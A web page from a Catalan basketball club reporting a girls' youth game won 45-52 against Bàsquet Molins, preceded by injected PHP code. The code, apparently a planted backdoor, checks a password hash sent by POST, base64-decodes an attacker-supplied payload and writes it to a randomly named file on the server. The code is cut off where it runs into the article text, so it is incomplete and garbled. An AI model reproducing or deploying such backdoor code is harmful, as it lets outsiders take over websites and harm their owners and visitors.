function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'Infantil femení 08A desperta a la segona part per endur-se el triomf vers Bàsquet Molins (45-52) - Tgn Bàsquet Club -

L’Infantil femení 08A desperta a la segona part per endur-se el triomf vers Bàsquet Molins (45-52)

Updated: maig 12, 2021

L’Infantil femení 08A recupera l’alè al descans i capgira el marcador derrotant el Bàsquet Molins. Un partit on les locals dominaven a plaer l’inici, aconseguint els rebots de les dues cistelles, atorgant segones oportunitats i contraatacs ben aprofitats. El baix ritme de joc de les liles, sumat a la falta d’encert, va fer arribar al descans amb una diferència de 12 punts (27-15). Les tarragonines, però, no estaven disposades a llençar la tovallola i, amb una ferma perseverança, aprofiten els últims deu minuts amb un parcial de 4-21, per no només igualar el ritme i el marcador, sinó també aconseguir la victòria.